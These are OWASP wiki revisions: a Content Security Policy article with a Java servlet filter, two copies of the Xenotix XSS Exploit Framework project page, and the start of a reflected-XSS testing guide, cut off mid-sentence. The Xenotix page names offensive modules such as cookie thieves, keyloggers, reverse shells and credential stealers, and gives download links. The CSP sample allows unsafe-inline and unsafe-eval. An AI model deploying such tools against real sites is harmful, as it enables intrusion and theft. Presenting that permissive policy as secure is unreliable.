| project_road_map = https://www.owasp.org/index.php/Projects/OWASP_Xenotix_XSS_Exploit_Framework/Roadmap
}}

Content Security Policy

2014-06-05T19:39:38Z

Ajin Abraham: spelling correction

Last revision (mm/dd/yy): '''08/31/2013'''

== Introduction ==
'''CSP''' stands for '''C'''ontent '''S'''ecurity '''P'''olicy.

Is an W3C specification offering the possbility to instruct the client browser from which location and/or which type of resources are allowed to be loaded. To define a loading behavior, the CSP specification use "directive" where a directive defines a loading behavior for a target resource type.

This article is based on version [http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html 1.1] of the W3C specification.

Directives can be specified using HTTP response header (a server may send more than one CSP HTTP header field with a given resource representation and a server may send different CSP header field values with different representations of the same resource or with different resources) or HTML Meta tag, the HTTP headers below are defined by the specs:
* '''Content-Security-Policy''' : Defined by W3C Specs as standard header, used by Chrome version 25 and later, Firefox version 23 and later, Opera version 19 and later.
* '''X-Content-Security-Policy''' : Used by Firefox until version 23, and Internet Explorer version 10 (which partially implements Content Security Policy).
* '''X-WebKit-CSP''' : Used by Chrome until version 25

The supported directives are:
* '''default-src''' : Define loading policy for all resources type in case of a resource type dedicated directive is not defined (fallback),
* '''script-src''' : Define which scripts the protected resource can execute,
* '''object-src''' : Define from where the protected resource can load plugins,
* '''style-src''' : Define which styles (CSS) the user applies to the protected resource,
* '''img-src''' : Define from where the protected resource can load images,
* '''media-src''' : Define from where the protected resource can load video and audio,
* '''frame-src''' : Define from where the protected resource can embed frames,
* '''font-src''' : Define from where the protected resource can load fonts,
* '''connect-src''' : Define which URIs the protected resource can load using script interfaces,
* '''form-action''' : Define which URIs can be used as the action of HTML form elements,
* '''sandbox''' : Specifies an HTML sandbox policy that the user agent applies to the protected resource,
* '''script-nonce''' : Define script execution by requiring the presence of the specified nonce on script elements,
* '''plugin-types''' : Define the set of plugins that can be invoked by the protected resource by limiting the types of resources that can be embedded,
* '''reflected-xss''' : Instructs a user agent to activate or deactivate any heuristics used to filter or block reflected cross-site scripting attacks, equivalent to the effects of the non-standard X-XSS-Protection header,
* '''report-uri''' : Specifies a URI to which the user agent sends reports about policy violation

An introduction to CSP is available on [http://www.html5rocks.com/en/tutorials/security/content-security-policy/ HTML5Rocks]. The browser support is shown on http://caniuse.com/#feat=contentsecuritypolicy

== Risk ==
The risk with CSP can have 2 main sources:
# Policies misconfiguration,
# Too permissive policies.

== Countermeasure ==
This article will focus on providing an sample implementation of a JEE Web Filter in order to apply a set of CSP policies on all HTTP response returned by server.

The policies will instruct the browser to have the loading behavior below using all HTTP headers defined in W3C Specs:
* Explicit loading definition of each resource type,
* Resources are loaded only from source domain,
* Inline style is not allowed,
* For JavaScript:
** ''Inline script'' will be allowed because inline scripting is commonly used (can be disabled if target site does not use this type of scripting),
** ''eval()'' function will be allowed in order to not break use of popular JavaScript libraries (ex: JQuery, JQueryUI, Sencha, ...) because they use eval() function (it was the case last time I have checked the source code from CDN ;) ),
* Generation of a random not guessable script nonce to use into all script tags,
* Plugin types only allow PDF and Flash,
* No font loading (configurable),
* No Audio / Video loading (configurable),
* Enable browser XSS filtering feature.

<pre style="color:navy">
The support for CSP directives is not the same level in major browsers (Firefox/Chrome/IE). It's recommanded to check the support
provided by target browsers (using site provided in link section of this article) in order to configure CSP policies. The sample
below try to provide a set of policies from which your can add policies specific to your application context.
</pre>

''This implementation provide an option to add CSP directives used by Firefox (Mozilla CSP directives).''

<pre>
import java.io.IOException;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.util.ArrayList;
import java.util.List;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.apache.commons.codec.binary.Hex;

/**
* Sample filter implementation to define a set of Content Security Policies.<br/>
*
* This implementation has a dependency on Commons Codec API.<br/>
*
* This filter set CSP policies using all HTTP headers defined into W3C specification.<br/>
* <br/>
* This implementation is oriented to be easily understandable and easily adapted.<br/>
*
*/
@WebFilter("/*")
public class CSPPoliciesApplier implements Filter {

/** Configuration member to specify if web app use web fonts */
public static final boolean APP_USE_WEBFONTS = false;

/** Configuration member to specify if web app use videos or audios */
public static final boolean APP_USE_AUDIOS_OR_VIDEOS = false;

/** Configuration member to specify if filter must add CSP directive used by Mozilla (Firefox) */
public static final boolean INCLUDE_MOZILLA_CSP_DIRECTIVES = true;

/** Filter configuration */
@SuppressWarnings("unused")
private FilterConfig filterConfig = null;

/** List CSP HTTP Headers */
private List<String> cspHeaders = new ArrayList<String>();

/** Collection of CSP polcies that will be applied */
private String policies = null;

/** Used for Script Nonce */
private SecureRandom prng = null;

/**
* Used to prepare (one time for all) set of CSP policies that will be applied on each HTTP response.
*
* @see javax.servlet.Filter#init(javax.servlet.FilterConfig)
*/
@Override
public void init(FilterConfig fConfig) throws ServletException {
// Get filter configuration
this.filterConfig = fConfig;

// Init secure random
try {
this.prng = SecureRandom.getInstance("SHA1PRNG");
}
catch (NoSuchAlgorithmException e) {
throw new ServletException(e);
}

// Define list of CSP HTTP Headers
this.cspHeaders.add("Content-Security-Policy");
this.cspHeaders.add("X-Content-Security-Policy");
this.cspHeaders.add("X-WebKit-CSP");

// Define CSP policies
// Loading policies for Frame and Sandboxing will be dynamically defined : We need to know if context use Frame
List<String> cspPolicies = new ArrayList<String>();
String originLocationRef = "'self'";
// --Disable default source in order to avoid browser fallback loading using 'default-src' locations
cspPolicies.add("default-src 'none'");
// --Define loading policies for Scripts
cspPolicies.add("script-src " + originLocationRef + " 'unsafe-inline' 'unsafe-eval'");
if (INCLUDE_MOZILLA_CSP_DIRECTIVES) {
cspPolicies.add("options inline-script eval-script");
cspPolicies.add("xhr-src 'self'");
}
// --Define loading policies for Plugins
cspPolicies.add("object-src " + originLocationRef);
// --Define loading policies for Styles (CSS)
cspPolicies.add("style-src " + originLocationRef);
// --Define loading policies for Images
cspPolicies.add("img-src " + originLocationRef);
// --Define loading policies for Form
cspPolicies.add("form-action " + originLocationRef);
// --Define loading policies for Audios/Videos
if (APP_USE_AUDIOS_OR_VIDEOS) {
cspPolicies.add("media-src " + originLocationRef);
}
// --Define loading policies for Fonts
if (APP_USE_WEBFONTS) {
cspPolicies.add("font-src " + originLocationRef);
}
// --Define loading policies for Connection
cspPolicies.add("connect-src " + originLocationRef);
// --Define loading policies for Plugins Types
cspPolicies.add("plugin-types application/pdf application/x-shockwave-flash");
// --Define browser XSS filtering feature running mode
cspPolicies.add("reflected-xss block");

// Target formating
this.policies = cspPolicies.toString().replaceAll("(\\[|\\])", "").replaceAll(",", ";").trim();
}

/**
* Add CSP policies on each HTTP response.
*
* @see javax.servlet.Filter#doFilter(javax.servlet.ServletRequest, javax.servlet.ServletResponse, javax.servlet.FilterChain)
*/
@Override
public void doFilter(ServletRequest request, ServletResponse response, FilterChain fchain) throws IOException, ServletException {
HttpServletRequest httpRequest = ((HttpServletRequest) request);
HttpServletResponse httpResponse = ((HttpServletResponse) response);

/* Step 1 : Detect if target resource is a Frame */
// Customize here according to your context...
boolean isFrame = true;

/* Step 2 : Add CSP policies to HTTP response */
StringBuilder policiesBuffer = new StringBuilder(this.policies);

// If resource is a frame add Frame/Sandbox CSP policy
if (isFrame) {
// Frame + Sandbox : Here sandbox allow nothing, customize sandbox options depending on your app....
policiesBuffer.append(";").append("frame-src 'self';sandbox");
if (INCLUDE_MOZILLA_CSP_DIRECTIVES) {
policiesBuffer.append(";").append("frame-ancestors 'self'");
}
}

// Add Script Nonce CSP Policy
// --Generate a random number
String randomNum = new Integer(this.prng.nextInt()).toString();
// --Get its digest
MessageDigest sha;
try {
sha = MessageDigest.getInstance("SHA-1");
}
catch (NoSuchAlgorithmException e) {
throw new ServletException(e);
}
byte[] digest = sha.digest(randomNum.getBytes());
// --Encode it into HEXA
String scriptNonce = Hex.encodeHexString(digest);
policiesBuffer.append(";").append("script-nonce ").append(scriptNonce);
// --Made available script nonce in view app layer
httpRequest.setAttribute("CSP_SCRIPT_NONCE", scriptNonce);

// Add policies to all HTTP headers
for (String header : this.cspHeaders) {
httpResponse.setHeader(header, policiesBuffer.toString());
}

/* Step 3 : Let request continue chain filter */
fchain.doFilter(request, response);
}

/**
* {@inheritDoc}
*
* @see javax.servlet.Filter#destroy()
*/
@Override
public void destroy() {
// Not used
}
}

</pre>

== Tools ==

[[Automated Audit using w3af|w3af]] audit tools (http://w3af.org) contain [https://github.com/andresriancho/w3af/blob/master/plugins/grep/csp.py plugin] to automatically audit web application to check if they correctly implement CSP policies.

<pre style="color:#088A08">
It's very useful to include this type of tools into a web application development process in order to
perform a regular automatic first level check (do not replace an manual audit and manual audit must be also conducted regularly).
</pre>

You can also use [https://www.oxdef.info/csp-tester CSP Tester (browser extension)] to build and test the policy for your web application.

== Information links ==
* W3C Specifications: CSP 1.0 - http://www.w3.org/TR/CSP, CSP 1.1 - http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html
* Introduction to CSP: http://www.html5rocks.com/en/tutorials/security/content-security-policy
* CSP browser support: http://caniuse.com/#feat=contentsecuritypolicy
* CSP readiness browser testing: http://erlend.oftedal.no/blog/csp/readiness/

[[Category:OWASP Java Project]]
[[Category: Injection]]
[[Category:Attack]]
[[Category:Injection Attack]]

OWASP Xenotix XSS Exploit Framework

2014-06-04T09:43:22Z

Ajin Abraham: added download md5

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 5==

[[Image:XenotixV5.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

== NEWS AND EVENTS ==
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Request Repeater
*URL Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Get Network IP
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*Gram WebCam Screenshot
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]
MD5: bdfce2d4af4012ecc20b86bed876a54a
====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-05-18T09:40:29Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 5==

[[Image:XenotixV5.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

== NEWS AND EVENTS ==
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Request Repeater
*URL Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Get Network IP
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*Gram WebCam Screenshot
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

Requirements
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

Testing for Reflected Cross site scripting (OTG-INPVAL-001)

2014-05-18T09:34:58Z

Ajin Abraham:

{{Template:OWASP Testing Guide v4}}

== Brief Summary ==

Reflected [[Cross-site Scripting (XSS)]] occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.

== Description of the Issue ==

Reflected XSS are the most frequent type of XSS attacks found in the wild.

Reflected XSS attacks are also known as non-persistent XSS attacks and, since the attack payload is delivered and executed via a single request and response, they are also referred to as first-order or type 1 XSS.

When a web application is vulnerable to this type of attack, it will
pass unvalidated input sent through requests back to the client. The common modus
operandi of the attack includes a design step, in which the attacker
creates and tests an offending URI, a social engineering step, in which
she convinces her victims to load this URI on their browsers, and the eventual
execution of the offending code using the victim's browser.

Commonly the attacker's code is written in the Javascript language, but
other scripting languages are also used, e.g., ActionScript and VBScript.

Attackers typically leverage these vulnerabilities to
